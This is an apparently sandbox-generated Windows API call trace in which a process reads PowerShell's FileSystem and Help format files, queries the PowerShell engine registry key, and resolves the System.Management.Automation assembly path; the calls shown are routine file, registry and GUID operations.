	[0690.422] ReadFile (in: hFile=0x2f4, lpBuffer=0x3335e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3335e88*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.422] ReadFile (in: hFile=0x2f4, lpBuffer=0x3335e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3335e88*, lpNumberOfBytesRead=0x14d338*=0x119, lpOverlapped=0x0) returned 1
	[0690.422] ReadFile (in: hFile=0x2f4, lpBuffer=0x3335e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3335e88*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0690.422] CloseHandle (hObject=0x2f4) returned 1
	[0690.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0690.423] SetErrorMode (uMode=0x1) returned 0x1
	[0690.423] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d2e0 | out: lpFileInformation=0x14d2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0690.423] SetErrorMode (uMode=0x1) returned 0x1
	[0690.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0690.423] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3c8 | out: phkResult=0x14d3c8*=0x2f4) returned 0x0
	[0690.423] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d34c, lpData=0x0, lpcbData=0x14d348*=0x0 | out: lpType=0x14d34c*=0x1, lpData=0x0, lpcbData=0x14d348*=0x56) returned 0x0
	[0690.423] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d2170
	[0690.423] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d31c, lpData=0x1b7d2170, lpcbData=0x14d318*=0x56 | out: lpType=0x14d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d318*=0x56) returned 0x0
	[0690.424] CoTaskMemFree (pv=0x1b7d2170) 
	[0690.424] RegCloseKey (hKey=0x2f4) returned 0x0
	[0690.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0690.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0690.426] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xca41f6d9, Data2=0xe548, Data3=0x4b2b, Data4=([0]=0x9b, [1]=0x4b, [2]=0xd, [3]=0x55, [4]=0x5c, [5]=0xed, [6]=0x26, [7]=0x18))) returned 0x0
	[0690.428] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xae573726, Data2=0x1ced, Data3=0x4006, Data4=([0]=0xae, [1]=0x7, [2]=0x3, [3]=0xdf, [4]=0x39, [5]=0x40, [6]=0x83, [7]=0xc7))) returned 0x0
	[0690.428] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x420614ad, Data2=0x78fb, Data3=0x4b67, Data4=([0]=0xaf, [1]=0x2f, [2]=0x48, [3]=0xab, [4]=0xd5, [5]=0x2e, [6]=0x2a, [7]=0x8d))) returned 0x0
	[0690.429] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xb3775081, Data2=0xd0d9, Data3=0x4fa1, Data4=([0]=0x9c, [1]=0x10, [2]=0x94, [3]=0x1e, [4]=0x66, [5]=0x2f, [6]=0xdd, [7]=0x23))) returned 0x0
	[0690.429] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0690.429] GetFileType (hFile=0x2f4) returned 0x1
	[0690.429] SetErrorMode (uMode=0x1) returned 0x1
	[0690.430] GetFileType (hFile=0x2f4) returned 0x1
	[0690.430] ReadFile (in: hFile=0x2f4, lpBuffer=0x3392028, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3392028*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.500] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.500] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.500] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.500] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.501] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.501] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.501] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.506] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.506] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.507] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.507] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.507] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.508] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.508] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.508] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.511] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.512] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.512] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.512] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.513] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.513] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.513] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.514] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.514] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.514] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.515] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.515] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.515] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.516] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.516] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.516] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.521] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.522] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.522] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.522] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.523] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.523] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.523] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.524] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.524] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.525] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.525] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.525] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.525] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.526] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.526] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.526] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.526] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.527] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.527] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.527] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.527] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.528] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.528] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.528] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.528] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.529] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.529] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.529] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.529] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.530] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.530] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0xf37, lpOverlapped=0x0) returned 1
	[0690.530] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd407, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd407*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0690.530] ReadFile (in: hFile=0x2f4, lpBuffer=0x31bd510, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x31bd510*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0690.531] CloseHandle (hObject=0x2f4) returned 1
	[0690.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0690.531] SetErrorMode (uMode=0x1) returned 0x1
	[0690.531] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d2e0 | out: lpFileInformation=0x14d2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0690.531] SetErrorMode (uMode=0x1) returned 0x1
	[0690.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0690.531] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3c8 | out: phkResult=0x14d3c8*=0x2f4) returned 0x0
	[0690.532] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d34c, lpData=0x0, lpcbData=0x14d348*=0x0 | out: lpType=0x14d34c*=0x1, lpData=0x0, lpcbData=0x14d348*=0x56) returned 0x0
	[0690.532] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d2170
	[0690.532] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d31c, lpData=0x1b7d2170, lpcbData=0x14d318*=0x56 | out: lpType=0x14d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d318*=0x56) returned 0x0
	[0690.532] CoTaskMemFree (pv=0x1b7d2170) 
	[0690.532] RegCloseKey (hKey=0x2f4) returned 0x0
	[0690.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0690.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0692.320] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xf3f4475b, Data2=0x8cd1, Data3=0x4bad, Data4=([0]=0xae, [1]=0xad, [2]=0x30, [3]=0x80, [4]=0x72, [5]=0x1d, [6]=0x15, [7]=0xbc))) returned 0x0
	[0692.321] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xca7dbbd8, Data2=0x3c5e, Data3=0x472b, Data4=([0]=0xa6, [1]=0xef, [2]=0x94, [3]=0x1c, [4]=0xe2, [5]=0xd4, [6]=0x57, [7]=0xb7))) returned 0x0
	[0692.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14ca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
